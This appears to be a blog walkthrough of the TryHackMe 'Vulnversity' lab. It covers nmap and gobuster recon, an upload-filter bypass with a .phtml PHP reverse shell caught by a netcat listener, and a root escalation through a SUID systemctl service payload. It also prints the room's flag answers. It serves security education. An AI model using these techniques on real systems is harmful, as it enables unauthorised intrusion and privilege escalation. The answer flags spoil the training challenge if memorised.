Skip to main content
Hashnodenightf00tnightf00t

Command Palette

Search for a command to run...

THM | Vulnversity

Updated
8 min read
THM | Vulnversity
N
nightf00t

VULNVERSITY

  • Learn about active recon, web app attacks and privilege escalation.

Task 1: Deploy The Machine

  • Here we will simply deploy the machine by selecting[Start Machine] labeled in green, and then select [Start AttackBox] at the top labeled in blue.

Task 2: Reconnaissance

  • After deployment, we now have a machine that we can target and attack. We see the following information:

Title, IP Address, Expires.

  • The piece I am concerned with here is the IP Address. In order to gather more information about the machine, we can use the network scanning tool Nmap (Network Mapper) to gain some more insight into the target host.

  • To scan the target machine, one command we can run is nmap -sV. This command will probe the hosts’ open ports, and attempt to determine It’s service/version information. My IP Address for my given machine in this session is 10.10.224.64 so we’ll stick with that.

nmap -sV 10.10.224.64

Nmap Bg:

  • Nmap is a free, open-source and powerful tool used to discover hosts (computers) and services on a computer network. In our example, we are using Nmap to scan this machine (with the IP Address: 10.10.224.64) to identify all services running on a particular port. (Keep in mind: ports are really just a landing area for a specific protocol. SSH runs on 22 while HTTP runs on 80, and so on.)

  • Nmap has many capabilities; the table below summarises some of its functionality for your reference:

Nmap Flag scan descriptions.

  • After the scan is completed, we glean the following information:

You should see something like this.

  • What this tells us is that we have discovered 6 ports that are actively open. This information will help us answer the following questions:

Q: Scan the box; how many ports are open?

A: 6

Q: What version of the squid proxy is running on the machine?

A: 3.5.12

Q: How many ports will Nmap scan if the flag -p-400 was used?

A: 400

Q: What is the most likely operating system this machine is running?

A: Ubuntu

Q: What port is the web server running on?

A: 3333

(Note: After running [nmap -sV 10.10.224.64] we see “Apache” which is indeed a webserver.)

Q: What is the flag for enabling verbose mode using Nmap?

A: -v

Task 3: Locating Directories Using Gobuster

  • With Gobuster, what we are going to do is to locate a directory within the webapp that isn’t supposed to be there (i.e discover a vulnerability) and use this to our advantage to upload a reverse shell that will call back for us to accept the invite and get into the webserver itself..

  • Here’s a table that summarizes some of Gobuster’s functionality:

Gobuster Flag scan descriptions.

  • What we are told to do in the room is to run the following:

gobuster dir -u http://10.10.224.64:3333

  • That part we can understand. What we are trying to do here is to use the Gobuster tool to search for directories within the provided URL. Easy enough. However, we need to know what we want to look for. That’s where wordlists come in. The room tells us that a word list set can be found under the following directory within the AttackBox:

/usr/share/wordlists/dirbuster/directory-list-1.0.txt

  • If you traverse your way through the directories into the .txt file you will see a list of words used to see if anything in the webapp directories stick under the 10.10.224.64 IP.

  • The complete command you should run is as follows:

gobuster dir -u 10.10.224.64 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt

  • Here is the output we should receive:

  • Take note that /internal/ is the only directory that is out of the ordinary. All other directories are to be expected on a public-facing website. If you add /internal/ to the http extension (e.g http://10.10.224.64:3333/internal/) it displays an upload page for uploading files.)

Q: What is the directory that has an upload form page?

A: /internal/

http://10.10.224.64:3333/internal/ file upload page.

  • Now, even though we have discovered the webpage, we don’t have to stop there. In the FireFox browser if you go to extensions and search for “Wappalyzer”, you can install and enable the extension. This will allow you to glean some insight into how the site was built and what file types it may or may not allow. Since we are the aggressor, naturally we want to uncover what file types are allowed so as to use that against the site.

Task 4: Compromise the Webserver

  • Now that we have found a form to upload files, we can leverage this to upload and execute our payload, which will lead to compromising the web server.

  • The room wants us to “fuzz” the upload form and try some file type extensions on it to see if it will take. Instead of using BurpSuite, we could just try the 5 different php file extensions and see which one gets through and which ones get blocked. After a little bit of trial and error, you will come to find that the .phtml extension is the only file type that is allowed which we will use for our payload.

Q: What common file type you’d want to upload to exploit the server is blocked? Try a couple to find out.

A: .php

(Note: .php is a file type you would want to upload because it would allow you to upload source code in order to exploit the server.)

Q: Run this attack, what extension is allowed?

A: .phtml

  • Now that we know this, we can use the given “php-reverse-shell” from the following URL:

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

  • Select, “Copy raw file” on the top right-hand side and paste it into a .phtml of your choosing. I’ve gone ahead and named mine, “twistcut.phtml”. (This mind you, is all being done inside of the THM AttackBox).

  • After you paste the reverse shell code into a file, you want to make sure to change the tun0 ip, by going to http://10.10.10.10 in the browser of your TryHackMe connected device. This will display a flag and your VPN/TryHackMe IP of: (in my case) 10.10.90.23. Now, when you are looking at your php-reverse-shell code within your twistcut.phtml file, you want to ensure that you use that tun0 ip and input into the “$ip:” slot. Now you can save and exit.

  • (Note: Make sure you insert the tun0 ip and now the target machine ip. If you do the former it will not work.)

  • Now in your terminal, you want to type the following command to listen in on when you submit the .phtml payload file. Run the following command in the terminal:

nc -lvnp 1234

  • Go to the upload page and submit the “twistcut.phtml” file. Once you do, you’ll want to add the /uploads/twistcut.html to the end of the URL to successfully hack into the webserver. The URL should read:

http://10.10.65.1:3333/internal/uploads/twistcut.phtml

  • If you look back at your terminal you’ll find that you are in and have successfully taken control of the webserver. In order to get the next two flags, you will want to run the following or a variation of the following:

ls*, **cd home*, *ls*, *cd bill*, *ls*, *cat user.txt**.*

  • This will give you both flags required to continue down the room.

Q: What is the name of the user who manages the webserver?

A: bill

Q: What is the user flag?

A: 8bd7992fbe8a6ad22a63361004cfcedb

Task 5: PrivEsc

  • Next, you want to bring in code from a tool called, “LinPEAS”. This tool is specifically designed for linux machines and its purpose is to run a script that will search for possible paths to escalate privileges on Linux/Unix*/MacOS hosts. Essentially, it will show you what might be vulnerable and highlight it for you so you can escalate your privileges and move even further into the webserver host.

https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

  • After running LinPEAS you will find that “/bin/systemctl” stands out the most of the SUID files. This answers the question:

Q: On the system, search for all SUID files. Which file stands out?

A: /bin/systemctl

  • Now that we know that particular path is vulnerable, we can use a tool called “GTFOBins”. This tool is a “curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems”. Perfect, because we know exactly what we are looking for. Enter [+SUID] into the search bar and look for “systemctl” as you scroll down. Follow the instructions it gives you and run the program using its original path. It should look something like this:

cd /tmp

eop=$(mktemp).service

echo “[Service]

ExecStart=/bin/sh -c “cat /root/root.txt > /tmp/output”

[Install]

WantedBy=multi-user.target’ > $eop

/bin/systemctl link $eop

/bin/systemctl enable — now $eop

From here you should be good to go, navigate your way through the /tmp/output directories to find the output and receive your final flag!

Q: Become root and get the last flag (/root/root.txt)

A: a58ff8579f0a9270368d33a9966c7fd5

Congratulations!

More from this blog

N

nightf00t

6 posts

Stepping through the night.